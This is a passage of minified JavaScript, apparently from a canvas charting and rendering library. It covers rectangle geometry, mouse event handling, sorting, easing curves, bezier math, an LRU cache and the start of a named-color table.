this.x=t[0]*e+t[2]*n+t[4],this.y=t[1]*e+t[3]*n+t[5],this}},t.prototype.toArray=function(t){return t[0]=this.x,t[1]=this.y,t},t.prototype.fromArray=function(t){this.x=t[0],this.y=t[1]},t.set=function(t,e,n){t.x=e,t.y=n},t.copy=function(t,e){t.x=e.x,t.y=e.y},t.len=function(t){return Math.sqrt(t.x*t.x+t.y*t.y)},t.lenSquare=function(t){return t.x*t.x+t.y*t.y},t.dot=function(t,e){return t.x*e.x+t.y*e.y},t.add=function(t,e,n){t.x=e.x+n.x,t.y=e.y+n.y},t.sub=function(t,e,n){t.x=e.x-n.x,t.y=e.y-n.y},t.scale=function(t,e,n){t.x=e.x*n,t.y=e.y*n},t.scaleAndAdd=function(t,e,n,i){t.x=e.x+n.x*i,t.y=e.y+n.y*i},t.lerp=function(t,e,n,i){var r=1-i;t.x=r*e.x+i*n.x,t.y=r*e.y+i*n.y},t}(),Pe=Math.min,Le=Math.max,Oe=Math.abs,Re=["x","y"],Ne=["width","height"],Be=new Ae,ze=new Ae,Ee=new Ae,Ve=new Ae,Fe=en(),He=Fe.minTv,Ge=Fe.maxTv,We=[0,0],Ue=function(){function t(t,e,n,i){Ye(this,t,e,n,i)}return t.set=function(t,e,n,i,r){return i<0&&(e+=i,i=-i),r<0&&(n+=r,r=-r),t.x=e,t.y=n,t.width=i,t.height=r,t},t.prototype.union=function(t){var e=Pe(t.x,this.x),n=Pe(t.y,this.y);isFinite(this.x)&&isFinite(this.width)?this.width=Le(t.x+t.width,this.x+this.width)-e:this.width=t.width,isFinite(this.y)&&isFinite(this.height)?this.height=Le(t.y+t.height,this.y+this.height)-n:this.height=t.height,this.x=e,this.y=n},t.prototype.applyTransform=function(e){t.applyTransform(this,this,e)},t.prototype.calculateTransform=function(t){return je([1,0,0,1,0,0],this,t)},t.prototype.intersect=function(e,n,i){return t.intersect(this,e,n,i)},t.intersect=function(e,n,i,r){i&&Ae.set(i,0,0);var o=r&&r.outIntersectRect||null,a=r&&r.clamp;if(o&&(o.x=o.y=o.width=o.height=NaN),!e||!n)return!1;e instanceof t||(e=Ye($e,e.x,e.y,e.width,e.height)),n instanceof t||(n=Ye(Qe,n.x,n.y,n.width,n.height));var s=!!i;Fe.reset(r,s);var l=Fe.touchThreshold,u=e.x+l,c=e.x+e.width-l,h=e.y+l,p=e.y+e.height-l,d=n.x+l,f=n.x+n.width-l,g=n.y+l,v=n.y+n.height-l;if(u>c||h>p||d>f||g>v)return!1;var y=!(c<d||f<u||p<g||v<h);return(s||o)&&(We[0]=1/0,We[1]=0,tn(u,c,d,f,0,s,o,a),tn(h,p,g,v,1,s,o,a),s&&Ae.copy(i,y?Fe.useDir?Fe.dirMinTv:He:Ge)),y},t.contain=function(t,e,n){return e>=t.x&&e<=t.x+t.width&&n>=t.y&&n<=t.y+t.height},t.prototype.contain=function(e,n){return t.contain(this,e,n)},t.prototype.clone=function(){return new t(this.x,this.y,this.width,this.height)},t.prototype.copy=function(t){Xe(this,t)},t.prototype.plain=function(){return{x:this.x,y:this.y,width:this.width,height:this.height}},t.prototype.isFinite=function(){return isFinite(this.x)&&isFinite(this.y)&&isFinite(this.width)&&isFinite(this.height)},t.prototype.isZero=function(){return 0===this.width||0===this.height},t.create=function(e){return new t(e?e.x:0,e?e.y:0,e?e.width:0,e?e.height:0)},t.copy=function(t,e){return t.x=e.x,t.y=e.y,t.width=e.width,t.height=e.height,t},t.applyTransform=function(t,e,n){if(n){if(n[1]<1e-5&&n[1]>-1e-5&&n[2]<1e-5&&n[2]>-1e-5){var i=n[0],r=n[3],o=n[4],a=n[5];return t.x=e.x*i+o,t.y=e.y*r+a,t.width=e.width*i,t.height=e.height*r,t.width<0&&(t.x+=t.width,t.width=-t.width),void(t.height<0&&(t.y+=t.height,t.height=-t.height))}Be.x=Ee.x=e.x,Be.y=Ve.y=e.y,ze.x=Ve.x=e.x+e.width,ze.y=Ee.y=e.y+e.height,Be.transform(n),Ve.transform(n),ze.transform(n),Ee.transform(n),t.x=Pe(Be.x,ze.x,Ee.x,Ve.x),t.y=Pe(Be.y,ze.y,Ee.y,Ve.y);var s=Le(Be.x,ze.x,Ee.x,Ve.x),l=Le(Be.y,ze.y,Ee.y,Ve.y);t.width=s-t.x,t.height=l-t.y}else t!==e&&Xe(t,e)},t.calculateTransform=function(t,e,n){var i=n.width/e.width,r=n.height/e.height;return Te(t=we(t||[]),t,At(Je,-e.x,-e.y)),Ce(t,t,At(Je,i,r)),Te(t,t,At(Je,n.x,n.y)),t},t}(),Ze=Ue.create,Ye=Ue.set,Xe=Ue.copy,je=Ue.calculateTransform,qe=Ue.applyTransform,Ke=Ue.contain,$e=new Ue(0,0,0,0),Qe=new Ue(0,0,0,0),Je=[];function tn(t,e,n,i,r,o,a,s){var l=Oe(e-n),u=Oe(i-t),c=Pe(l,u),h=Re[r],p=Re[1-r],d=Ne[r];e<n||i<t?l<u?(o&&(Ge[h]=-l),s&&(a[h]=e,a[d]=0)):(o&&(Ge[h]=u),s&&(a[h]=t,a[d]=0)):(a&&(a[h]=Le(t,n),a[d]=Pe(e,i)-a[h]),o&&(c<We[0]||Fe.useDir)&&(We[0]=Pe(c,We[0]),(l<u||!Fe.bidirectional)&&(He[h]=l,He[p]=0,Fe.useDir&&Fe.calcDirMTV()),(l>=u||!Fe.bidirectional)&&(He[h]=-u,He[p]=0,Fe.useDir&&Fe.calcDirMTV())))}function en(){var t=0,e=new Ae,n=new Ae,i={minTv:new Ae,maxTv:new Ae,useDir:!1,dirMinTv:new Ae,touchThreshold:0,bidirectional:!0,negativeSize:!1,reset:function(r,o){i.touchThreshold=0,r&&null!=r.touchThreshold&&(i.touchThreshold=Le(0,r.touchThreshold)),i.negativeSize=!1,o&&(i.minTv.set(1/0,1/0),i.maxTv.set(0,0),i.useDir=!1,r&&null!=r.direction&&(i.useDir=!0,i.dirMinTv.copy(i.minTv),n.copy(i.minTv),t=r.direction,i.bidirectional=null==r.bidirectional||!!r.bidirectional,i.bidirectional||e.set(Math.cos(t),Math.sin(t))))},calcDirMTV:function(){var o=i.minTv,a=i.dirMinTv,s=o.y*o.y+o.x*o.x,l=Math.sin(t),u=Math.cos(t),c=l*o.y+u*o.x;r(c)?r(o.x)&&r(o.y)&&a.set(0,0):(n.x=s*u/c,n.y=s*l/c,r(n.x)&&r(n.y)?a.set(0,0):(i.bidirectional||e.dot(n)>0)&&n.len()<a.len()&&a.copy(n))}};function r(t){return Oe(t)<1e-10}return i}var nn="silent";function rn(){ve(this.event)}var on=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.handler=null,e}return n(e,t),e.prototype.dispose=function(){},e.prototype.setCursor=function(){},e}(Kt),an=function(t,e){this.x=t,this.y=e},sn=["click","dblclick","mousewheel","mouseout","mouseup","mousedown","mousemove","contextmenu"],ln=new Ue(0,0,0,0),un=function(t){function e(e,n,i,r,o){var a=t.call(this)||this;return a._hovered=new an(0,0),a.storage=e,a.painter=n,a.painterRoot=r,a._pointerSize=o,i=i||new on,a.proxy=null,a.setHandlerProxy(i),a._draggingMgr=new qt(a),a}return n(e,t),e.prototype.setHandlerProxy=function(t){this.proxy&&this.proxy.dispose(),t&&(E(sn,function(e){t.on&&t.on(e,this[e],this)},this),t.handler=this),this.proxy=t},e.prototype.mousemove=function(t){var e=t.zrX,n=t.zrY,i=pn(this,e,n),r=this._hovered,o=r.target;o&&!o.__zr&&(o=(r=this.findHover(r.x,r.y)).target);var a=this._hovered=i?new an(e,n):this.findHover(e,n),s=a.target,l=this.proxy;l.setCursor&&l.setCursor(s?s.cursor:"default"),o&&s!==o&&this.dispatchToElement(r,"mouseout",t),this.dispatchToElement(a,"mousemove",t),s&&s!==o&&this.dispatchToElement(a,"mouseover",t)},e.prototype.mouseout=function(t){var e=t.zrEventControl;"only_globalout"!==e&&this.dispatchToElement(this._hovered,"mouseout",t),"no_globalout"!==e&&this.trigger("globalout",{type:"globalout",event:t})},e.prototype.resize=function(){this._hovered=new an(0,0)},e.prototype.dispatch=function(t,e){var n=this[t];n&&n.call(this,e)},e.prototype.dispose=function(){this.proxy.dispose(),this.storage=null,this.proxy=null,this.painter=null},e.prototype.setCursorStyle=function(t){var e=this.proxy;e.setCursor&&e.setCursor(t)},e.prototype.dispatchToElement=function(t,e,n){var i=(t=t||{}).target;if(!i||!i.silent){for(var r="on"+e,o=function(t,e,n){return{type:t,event:n,target:e.target,topTarget:e.topTarget,cancelBubble:!1,offsetX:n.zrX,offsetY:n.zrY,gestureEvent:n.gestureEvent,pinchX:n.pinchX,pinchY:n.pinchY,pinchScale:n.pinchScale,wheelDelta:n.zrDelta,zrByTouch:n.zrByTouch,which:n.which,stop:rn}}(e,t,n);i&&(i[r]&&(o.cancelBubble=!!i[r].call(i,o)),i.trigger(e,o),i=i.__hostTarget?i.__hostTarget:i.parent,!o.cancelBubble););o.cancelBubble||(this.trigger(e,o),this.painter&&this.painter.eachOtherLayer&&this.painter.eachOtherLayer(function(t){"function"==typeof t[r]&&t[r].call(t,o),t.trigger&&t.trigger(e,o)}))}},e.prototype.findHover=function(t,e,n){var i=this.storage.getDisplayList(),r=new an(t,e);if(hn(i,r,t,e,n),this._pointerSize&&!r.target){for(var o=[],a=this._pointerSize,s=a/2,l=new Ue(t-s,e-s,a,a),u=i.length-1;u>=0;u--){var c=i[u];c===n||c.ignore||c.ignoreCoarsePointer||c.parent&&c.parent.ignoreCoarsePointer||(ln.copy(c.getBoundingRect()),c.transform&&ln.applyTransform(c.transform),ln.intersect(l)&&o.push(c))}if(o.length)for(var h=Math.PI/12,p=2*Math.PI,d=0;d<s;d+=4)for(var f=0;f<p;f+=h){if(hn(o,r,t+d*Math.cos(f),e+d*Math.sin(f),n),r.target)return r}}return r},e.prototype.processGesture=function(t,e){this._gestureMgr||(this._gestureMgr=new me);var n=this._gestureMgr;"start"===e&&n.clear();var i=n.recognize(t,this.findHover(t.zrX,t.zrY,null).target,this.proxy.dom);if("end"===e&&n.clear(),i){var r=i.type;t.gestureEvent=r;var o=new an;o.target=i.target,this.dispatchToElement(o,r,i.event)}},e}(Kt);function cn(t,e,n){if(t[t.rectHover?"rectContain":"contain"](e,n)){for(var i=t,r=void 0,o=!1;i;){if(i.ignoreClip&&(o=!0),!o){var a=i.getClipPath();if(a&&!a.contain(e,n))return!1}i.silent&&(r=!0);var s=i.__hostTarget;i=s?i.ignoreHostSilent?null:s:i.parent}return!r||nn}return!1}function hn(t,e,n,i,r){for(var o=t.length-1;o>=0;o--){var a=t[o],s=void 0;if(a!==r&&!a.ignore&&(s=cn(a,n,i))&&(!e.topTarget&&(e.topTarget=a),s!==nn)){e.target=a;break}}}function pn(t,e,n){var i=t.painter;return e<0||e>i.getWidth()||n<0||n>i.getHeight()}E(["click","mousedown","mouseup","mousewheel","dblclick","contextmenu"],function(t){un.prototype[t]=function(e){var n,i,r=e.zrX,o=e.zrY,a=pn(this,r,o);if("mouseup"===t&&a||(i=(n=this.findHover(r,o)).target),"mousedown"===t)this._downEl=i,this._downPoint=[e.zrX,e.zrY],this._upEl=i;else if("mouseup"===t)this._upEl=i;else if("click"===t){if(this._downEl!==this._upEl||!this._downPoint||Ft(this._downPoint,[e.zrX,e.zrY])>4)return;this._downPoint=null}this.dispatchToElement(n,t,e)}});function dn(t,e,n,i){var r=e+1;if(r===n)return 1;if(i(t[r++],t[e])<0){for(;r<n&&i(t[r],t[r-1])<0;)r++;!function(t,e,n){n--;for(;e<n;){var i=t[e];t[e++]=t[n],t[n--]=i}}(t,e,r)}else for(;r<n&&i(t[r],t[r-1])>=0;)r++;return r-e}function fn(t,e,n,i,r){for(i===e&&i++;i<n;i++){for(var o,a=t[i],s=e,l=i;s<l;)r(a,t[o=s+l>>>1])<0?l=o:s=o+1;var u=i-s;switch(u){case 3:t[s+3]=t[s+2];case 2:t[s+2]=t[s+1];case 1:t[s+1]=t[s];break;default:for(;u>0;)t[s+u]=t[s+u-1],u--}t[s]=a}}function gn(t,e,n,i,r,o){var a=0,s=0,l=1;if(o(t,e[n+r])>0){for(s=i-r;l<s&&o(t,e[n+r+l])>0;)a=l,(l=1+(l<<1))<=0&&(l=s);l>s&&(l=s),a+=r,l+=r}else{for(s=r+1;l<s&&o(t,e[n+r-l])<=0;)a=l,(l=1+(l<<1))<=0&&(l=s);l>s&&(l=s);var u=a;a=r-l,l=r-u}for(a++;a<l;){var c=a+(l-a>>>1);o(t,e[n+c])>0?a=c+1:l=c}return l}function vn(t,e,n,i,r,o){var a=0,s=0,l=1;if(o(t,e[n+r])<0){for(s=r+1;l<s&&o(t,e[n+r-l])<0;)a=l,(l=1+(l<<1))<=0&&(l=s);l>s&&(l=s);var u=a;a=r-l,l=r-u}else{for(s=i-r;l<s&&o(t,e[n+r+l])>=0;)a=l,(l=1+(l<<1))<=0&&(l=s);l>s&&(l=s),a+=r,l+=r}for(a++;a<l;){var c=a+(l-a>>>1);o(t,e[n+c])<0?l=c:a=c+1}return l}function yn(t,e){var n,i,r=7,o=0,a=[];function s(s){var l=n[s],u=i[s],c=n[s+1],h=i[s+1];i[s]=u+h,s===o-3&&(n[s+1]=n[s+2],i[s+1]=i[s+2]),o--;var p=vn(t[c],t,l,u,0,e);l+=p,0!==(u-=p)&&0!==(h=gn(t[l+u-1],t,c,h,h-1,e))&&(u<=h?function(n,i,o,s){var l=0;for(l=0;l<i;l++)a[l]=t[n+l];var u=0,c=o,h=n;if(t[h++]=t[c++],0===--s){for(l=0;l<i;l++)t[h+l]=a[u+l];return}if(1===i){for(l=0;l<s;l++)t[h+l]=t[c+l];return void(t[h+s]=a[u])}var p,d,f,g=r;for(;;){p=0,d=0,f=!1;do{if(e(t[c],a[u])<0){if(t[h++]=t[c++],d++,p=0,0===--s){f=!0;break}}else if(t[h++]=a[u++],p++,d=0,1===--i){f=!0;break}}while((p|d)<g);if(f)break;do{if(0!==(p=vn(t[c],a,u,i,0,e))){for(l=0;l<p;l++)t[h+l]=a[u+l];if(h+=p,u+=p,(i-=p)<=1){f=!0;break}}if(t[h++]=t[c++],0===--s){f=!0;break}if(0!==(d=gn(a[u],t,c,s,0,e))){for(l=0;l<d;l++)t[h+l]=t[c+l];if(h+=d,c+=d,0===(s-=d)){f=!0;break}}if(t[h++]=a[u++],1===--i){f=!0;break}g--}while(p>=7||d>=7);if(f)break;g<0&&(g=0),g+=2}if((r=g)<1&&(r=1),1===i){for(l=0;l<s;l++)t[h+l]=t[c+l];t[h+s]=a[u]}else{if(0===i)throw new Error;for(l=0;l<i;l++)t[h+l]=a[u+l]}}(l,u,c,h):function(n,i,o,s){var l=0;for(l=0;l<s;l++)a[l]=t[o+l];var u=n+i-1,c=s-1,h=o+s-1,p=0,d=0;if(t[h--]=t[u--],0===--i){for(p=h-(s-1),l=0;l<s;l++)t[p+l]=a[l];return}if(1===s){for(d=(h-=i)+1,p=(u-=i)+1,l=i-1;l>=0;l--)t[d+l]=t[p+l];return void(t[h]=a[c])}var f=r;for(;;){var g=0,v=0,y=!1;do{if(e(a[c],t[u])<0){if(t[h--]=t[u--],g++,v=0,0===--i){y=!0;break}}else if(t[h--]=a[c--],v++,g=0,1===--s){y=!0;break}}while((g|v)<f);if(y)break;do{if(0!==(g=i-vn(a[c],t,n,i,i-1,e))){for(i-=g,d=(h-=g)+1,p=(u-=g)+1,l=g-1;l>=0;l--)t[d+l]=t[p+l];if(0===i){y=!0;break}}if(t[h--]=a[c--],1===--s){y=!0;break}if(0!==(v=s-gn(t[u],a,0,s,s-1,e))){for(s-=v,d=(h-=v)+1,p=(c-=v)+1,l=0;l<v;l++)t[d+l]=a[p+l];if(s<=1){y=!0;break}}if(t[h--]=t[u--],0===--i){y=!0;break}f--}while(g>=7||v>=7);if(y)break;f<0&&(f=0),f+=2}(r=f)<1&&(r=1);if(1===s){for(d=(h-=i)+1,p=(u-=i)+1,l=i-1;l>=0;l--)t[d+l]=t[p+l];t[h]=a[c]}else{if(0===s)throw new Error;for(p=h-(s-1),l=0;l<s;l++)t[p+l]=a[l]}}(l,u,c,h))}return n=[],i=[],{mergeRuns:function(){for(;o>1;){var t=o-2;if(t>=1&&i[t-1]<=i[t]+i[t+1]||t>=2&&i[t-2]<=i[t]+i[t-1])i[t-1]<i[t+1]&&t--;else if(i[t]>i[t+1])break;s(t)}},forceMergeRuns:function(){for(;o>1;){var t=o-2;t>0&&i[t-1]<i[t+1]&&t--,s(t)}},pushRun:function(t,e){n[o]=t,i[o]=e,o+=1}}}function mn(t,e,n,i){n||(n=0),i||(i=t.length);var r=i-n;if(!(r<2)){var o=0;if(r<32)fn(t,n,i,n+(o=dn(t,n,i,e)),e);else{var a=yn(t,e),s=function(t){for(var e=0;t>=32;)e|=1&t,t>>=1;return t+e}(r);do{if((o=dn(t,n,i,e))<s){var l=r;l>s&&(l=s),fn(t,n,n+l,n+o,e),o=l}a.pushRun(n,o),a.mergeRuns(),r-=o,n+=o}while(0!==r);a.forceMergeRuns()}}}var _n=!1;function xn(){_n||(_n=!0,console.warn("z / z2 / zlevel of displayable is invalid, which may cause unexpected errors"))}function bn(t,e){return t.zlevel===e.zlevel?t.z===e.z?t.z2-e.z2:t.z-e.z:t.zlevel-e.zlevel}var wn=function(){function t(){this._roots=[],this._displayList=[],this._displayListLen=0,this.displayableSortFunc=bn}return t.prototype.traverse=function(t,e){for(var n=0;n<this._roots.length;n++)this._roots[n].traverse(t,e)},t.prototype.getDisplayList=function(t,e){e=e||!1;var n=this._displayList;return!t&&n.length||this.updateDisplayList(e),n},t.prototype.updateDisplayList=function(t){this._displayListLen=0;for(var e=this._roots,n=this._displayList,i=0,r=e.length;i<r;i++)this._updateAndAddDisplayable(e[i],null,t);n.length=this._displayListLen,mn(n,bn)},t.prototype._updateAndAddDisplayable=function(t,e,n){if(!t.ignore||n){t.beforeUpdate(),t.update(),t.afterUpdate();var i=t.getClipPath(),r=e&&e.length,o=0,a=t.__clipPaths;if(!t.ignoreClip&&(r||i)){if(a||(a=t.__clipPaths=[]),r)for(var s=0;s<e.length;s++)a[o++]=e[s];for(var l=i,u=t;l;)l.parent=u,l.updateTransform(),a[o++]=l,u=l,l=l.getClipPath()}if(a&&(a.length=o),t.childrenRef){for(var c=t.childrenRef(),h=0;h<c.length;h++){var p=c[h];t.__dirty&&(p.__dirty|=1),this._updateAndAddDisplayable(p,a,n)}t.__dirty=0}else{var d=t;isNaN(d.z)&&(xn(),d.z=0),isNaN(d.z2)&&(xn(),d.z2=0),isNaN(d.zlevel)&&(xn(),d.zlevel=0),this._displayList[this._displayListLen++]=d}var f=t.getDecalElement&&t.getDecalElement();f&&this._updateAndAddDisplayable(f,a,n);var g=t.getTextGuideLine();g&&this._updateAndAddDisplayable(g,a,n);var v=t.getTextContent();v&&this._updateAndAddDisplayable(v,a,n)}},t.prototype.addRoot=function(t){t.__zr&&t.__zr.storage===this||this._roots.push(t)},t.prototype.delRoot=function(t){if(t instanceof Array)for(var e=0,n=t.length;e<n;e++)this.delRoot(t[e]);else{var i=R(this._roots,t);i>=0&&this._roots.splice(i,1)}},t.prototype.delAllRoots=function(){this._roots=[],this._displayList=[],this._displayListLen=0},t.prototype.getRoots=function(){return this._roots},t.prototype.dispose=function(){this._displayList=null,this._roots=null},t}(),Sn=r.hasGlobalWindow&&(window.requestAnimationFrame&&window.requestAnimationFrame.bind(window)||window.msRequestAnimationFrame&&window.msRequestAnimationFrame.bind(window)||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame)||function(t){return setTimeout(t,16)},Mn={linear:function(t){return t},quadraticIn:function(t){return t*t},quadraticOut:function(t){return t*(2-t)},quadraticInOut:function(t){return(t*=2)<1?.5*t*t:-.5*(--t*(t-2)-1)},cubicIn:function(t){return t*t*t},cubicOut:function(t){return--t*t*t+1},cubicInOut:function(t){return(t*=2)<1?.5*t*t*t:.5*((t-=2)*t*t+2)},quarticIn:function(t){return t*t*t*t},quarticOut:function(t){return 1- --t*t*t*t},quarticInOut:function(t){return(t*=2)<1?.5*t*t*t*t:-.5*((t-=2)*t*t*t-2)},quinticIn:function(t){return t*t*t*t*t},quinticOut:function(t){return--t*t*t*t*t+1},quinticInOut:function(t){return(t*=2)<1?.5*t*t*t*t*t:.5*((t-=2)*t*t*t*t+2)},sinusoidalIn:function(t){return 1-Math.cos(t*Math.PI/2)},sinusoidalOut:function(t){return Math.sin(t*Math.PI/2)},sinusoidalInOut:function(t){return.5*(1-Math.cos(Math.PI*t))},exponentialIn:function(t){return 0===t?0:Math.pow(1024,t-1)},exponentialOut:function(t){return 1===t?1:1-Math.pow(2,-10*t)},exponentialInOut:function(t){return 0===t?0:1===t?1:(t*=2)<1?.5*Math.pow(1024,t-1):.5*(2-Math.pow(2,-10*(t-1)))},circularIn:function(t){return 1-Math.sqrt(1-t*t)},circularOut:function(t){return Math.sqrt(1- --t*t)},circularInOut:function(t){return(t*=2)<1?-.5*(Math.sqrt(1-t*t)-1):.5*(Math.sqrt(1-(t-=2)*t)+1)},elasticIn:function(t){var e,n=.1;return 0===t?0:1===t?1:(!n||n<1?(n=1,e=.1):e=.4*Math.asin(1/n)/(2*Math.PI),-n*Math.pow(2,10*(t-=1))*Math.sin((t-e)*(2*Math.PI)/.4))},elasticOut:function(t){var e,n=.1;return 0===t?0:1===t?1:(!n||n<1?(n=1,e=.1):e=.4*Math.asin(1/n)/(2*Math.PI),n*Math.pow(2,-10*t)*Math.sin((t-e)*(2*Math.PI)/.4)+1)},elasticInOut:function(t){var e,n=.1,i=.4;return 0===t?0:1===t?1:(!n||n<1?(n=1,e=.1):e=i*Math.asin(1/n)/(2*Math.PI),(t*=2)<1?n*Math.pow(2,10*(t-=1))*Math.sin((t-e)*(2*Math.PI)/i)*-.5:n*Math.pow(2,-10*(t-=1))*Math.sin((t-e)*(2*Math.PI)/i)*.5+1)},backIn:function(t){var e=1.70158;return t*t*((e+1)*t-e)},backOut:function(t){var e=1.70158;return--t*t*((e+1)*t+e)+1},backInOut:function(t){var e=2.5949095;return(t*=2)<1?t*t*((e+1)*t-e)*.5:.5*((t-=2)*t*((e+1)*t+e)+2)},bounceIn:function(t){return 1-Mn.bounceOut(1-t)},bounceOut:function(t){return t<1/2.75?7.5625*t*t:t<2/2.75?7.5625*(t-=1.5/2.75)*t+.75:t<2.5/2.75?7.5625*(t-=2.25/2.75)*t+.9375:7.5625*(t-=2.625/2.75)*t+.984375},bounceInOut:function(t){return t<.5?.5*Mn.bounceIn(2*t):.5*Mn.bounceOut(2*t-1)+.5}},Tn=Math.pow,kn=Math.sqrt,Cn=1e-8,In=1e-4,Dn=kn(3),An=1/3,Pn=Ct(),Ln=Ct(),On=Ct();function Rn(t){return t>-1e-8&&t<Cn}function Nn(t){return t>Cn||t<-1e-8}function Bn(t,e,n,i,r){var o=1-r;return o*o*(o*t+3*r*e)+r*r*(r*i+3*o*n)}function zn(t,e,n,i,r){var o=1-r;return 3*(((e-t)*o+2*(n-e)*r)*o+(i-n)*r*r)}function En(t,e,n,i,r,o){var a=i+3*(e-n)-t,s=3*(n-2*e+t),l=3*(e-t),u=t-r,c=s*s-3*a*l,h=s*l-9*a*u,p=l*l-3*s*u,d=0;if(Rn(c)&&Rn(h)){if(Rn(s))o[0]=0;else(M=-l/s)>=0&&M<=1&&(o[d++]=M)}else{var f=h*h-4*c*p;if(Rn(f)){var g=h/c,v=-g/2;(M=-s/a+g)>=0&&M<=1&&(o[d++]=M),v>=0&&v<=1&&(o[d++]=v)}else if(f>0){var y=kn(f),m=c*s+1.5*a*(-h+y),_=c*s+1.5*a*(-h-y);(M=(-s-((m=m<0?-Tn(-m,An):Tn(m,An))+(_=_<0?-Tn(-_,An):Tn(_,An))))/(3*a))>=0&&M<=1&&(o[d++]=M)}else{var x=(2*c*s-3*a*h)/(2*kn(c*c*c)),b=Math.acos(x)/3,w=kn(c),S=Math.cos(b),M=(-s-2*w*S)/(3*a),T=(v=(-s+w*(S+Dn*Math.sin(b)))/(3*a),(-s+w*(S-Dn*Math.sin(b)))/(3*a));M>=0&&M<=1&&(o[d++]=M),v>=0&&v<=1&&(o[d++]=v),T>=0&&T<=1&&(o[d++]=T)}}return d}function Vn(t,e,n,i,r){var o=6*n-12*e+6*t,a=9*e+3*i-3*t-9*n,s=3*e-3*t,l=0;if(Rn(a)){if(Nn(o))(c=-s/o)>=0&&c<=1&&(r[l++]=c)}else{var u=o*o-4*a*s;if(Rn(u))r[0]=-o/(2*a);else if(u>0){var c,h=kn(u),p=(-o-h)/(2*a);(c=(-o+h)/(2*a))>=0&&c<=1&&(r[l++]=c),p>=0&&p<=1&&(r[l++]=p)}}return l}function Fn(t,e,n,i,r,o){var a=(e-t)*r+t,s=(n-e)*r+e,l=(i-n)*r+n,u=(s-a)*r+a,c=(l-s)*r+s,h=(c-u)*r+u;o[0]=t,o[1]=a,o[2]=u,o[3]=h,o[4]=h,o[5]=c,o[6]=l,o[7]=i}function Hn(t,e,n,i,r,o,a,s,l){for(var u=t,c=e,h=0,p=1/l,d=1;d<=l;d++){var f=d*p,g=Bn(t,n,r,a,f),v=Bn(e,i,o,s,f),y=g-u,m=v-c;h+=Math.sqrt(y*y+m*m),u=g,c=v}return h}function Gn(t,e,n,i){var r=1-i;return r*(r*t+2*i*e)+i*i*n}function Wn(t,e,n,i){return 2*((1-i)*(e-t)+i*(n-e))}function Un(t,e,n){var i=t+n-2*e;return 0===i?.5:(t-e)/i}function Zn(t,e,n,i,r){var o=(e-t)*i+t,a=(n-e)*i+e,s=(a-o)*i+o;r[0]=t,r[1]=o,r[2]=s,r[3]=s,r[4]=a,r[5]=n}function Yn(t,e,n,i,r,o,a){for(var s=t,l=e,u=0,c=1/a,h=1;h<=a;h++){var p=h*c,d=Gn(t,n,r,p),f=Gn(e,i,o,p),g=d-s,v=f-l;u+=Math.sqrt(g*g+v*v),s=d,l=f}return u}var Xn=/cubic-bezier\(([0-9,\.e ]+)\)/;function jn(t){var e=t&&Xn.exec(t);if(e){var n=e[1].split(","),i=+ht(n[0]),r=+ht(n[1]),o=+ht(n[2]),a=+ht(n[3]);if(isNaN(i+r+o+a))return;var s=[];return function(t){return t<=0?0:t>=1?1:En(0,i,o,1,t,s)&&Bn(0,r,a,1,s[0])}}}var qn=function(){function t(t){this._inited=!1,this._startTime=0,this._pausedTime=0,this._paused=!1,this._life=t.life||1e3,this._delay=t.delay||0,this.loop=t.loop||!1,this.onframe=t.onframe||St,this.ondestroy=t.ondestroy||St,this.onrestart=t.onrestart||St,t.easing&&this.setEasing(t.easing)}return t.prototype.step=function(t,e){if(this._inited||(this._startTime=t+this._delay,this._inited=!0),!this._paused){var n=this._life,i=t-this._startTime-this._pausedTime,r=i/n;r<0&&(r=0),r=Math.min(r,1);var o=this.easingFunc,a=o?o(r):r;if(this.onframe(a),1===r){if(!this.loop)return!0;var s=i%n;this._startTime=t-s,this._pausedTime=0,this.onrestart()}return!1}this._pausedTime+=e},t.prototype.pause=function(){this._paused=!0},t.prototype.resume=function(){this._paused=!1},t.prototype.setEasing=function(t){this.easing=t,this.easingFunc=X(t)?t:Mn[t]||jn(t)},t}(),Kn=function(t){this.value=t},$n=function(){function t(){this._len=0}return t.prototype.insert=function(t){var e=new Kn(t);return this.insertEntry(e),e},t.prototype.insertEntry=function(t){this.head?(this.tail.next=t,t.prev=this.tail,t.next=null,this.tail=t):this.head=this.tail=t,this._len++},t.prototype.remove=function(t){var e=t.prev,n=t.next;e?e.next=n:this.head=n,n?n.prev=e:this.tail=e,t.next=t.prev=null,this._len--},t.prototype.len=function(){return this._len},t.prototype.clear=function(){this.head=this.tail=null,this._len=0},t}(),Qn=function(){function t(t){this._list=new $n,this._maxSize=10,this._map={},this._maxSize=t}return t.prototype.put=function(t,e){var n=this._list,i=this._map,r=null;if(null==i[t]){var o=n.len(),a=this._lastRemovedEntry;if(o>=this._maxSize&&o>0){var s=n.head;n.remove(s),delete i[s.key],r=s.value,this._lastRemovedEntry=s}a?a.value=e:a=new Kn(e),a.key=t,n.insertEntry(a),i[t]=a}return r},t.prototype.get=function(t){var e=this._map[t],n=this._list;if(null!=e)return e!==n.tail&&(n.remove(e),n.insertEntry(e)),e.value},t.prototype.clear=function(){this._list.clear(),this._map={}},t.prototype.len=function(){return this._list.len()},t}(),Jn={transparent:[0,0,0,0],aliceblue:[240,248,255,1],antiquewhite:[250,235,215,1],aqua:[0,255,255,1],aquamarine:[127,255,212,1],azure:[240,255,255,1],beige:[245,245,220,1],bisque:[255,228,196,1],black:[0,0,0,1],blanchedalmond:[255,235,205,1],blue:[0,0,255,1],blueviolet:[138,43,226,1],brown:[165,42,42,1],burlywood:[222,184,135,1],cadetblue:[95,158,160,1],chartreuse:[127,255,0,1],chocolate:[210,105,30,1],coral:[255,127,80,1],cornflowerblue:[100,149,237,1],cornsilk:[255,248,220,1],crimson:[220,20,60,1],cyan:[0,255,255,1],darkblue:[0,0,139,1],darkcyan:[0,139,139,1],darkgoldenrod:[184,134,11,1],darkgray:[169,169,169,1],darkgreen:[0,100,0,1],darkgrey:[169,169,169,1],darkkhaki:[189,183,107,1],darkmagenta:[139,0,139,1],darkolivegreen:[85,107,47,1],darkorange:[255,140,0,1],darkorchid:[153,50,204,1],darkred:[139,0,0,1],darksalmon:[233,150,122,1],darkseagreen:[143,188,143,1],darkslateblue:[72,61,139,1],darkslategray:[47,79,79,1],darkslategrey:[47,79,79,1],darkturquoise:[0,206,209,1],darkviolet:[148,0,211,1],deeppink:[255,20,147,1],deepskyblue:[0,191,255,1],dimgray:[105,105,105,1],dimgrey:[105,105,105,1],dodgerblue:[30,144,255,1],firebrick:[178,34,34,1],floralwhite:[255,250,240,1],forestgreen:[34,139,34,1],fuchsia:[255,0,255,1],gainsboro:[220,220,220